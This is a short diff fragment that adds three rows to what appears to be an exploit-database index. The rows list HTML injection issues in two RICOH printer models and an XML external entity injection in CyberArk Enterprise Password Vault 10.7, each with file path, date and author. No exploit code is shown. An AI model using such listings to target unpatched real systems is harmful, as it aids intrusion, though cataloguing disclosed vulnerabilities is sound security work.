+46826,exploits/hardware/webapps/46826.txt,"RICOH SP 4510DN Printer - HTML Injection",2019-05-10,"Ismail Tasdelen",webapps,hardware,
+46827,exploits/hardware/webapps/46827.txt,"RICOH SP 4520DN Printer - HTML Injection",2019-05-10,"Ismail Tasdelen",webapps,hardware,
+46828,exploits/multiple/webapps/46828.txt,"CyberArk Enterprise Password Vault 10.7 - XML External Entity Injection",2019-05-10,"Marcelo Toran",webapps,multiple,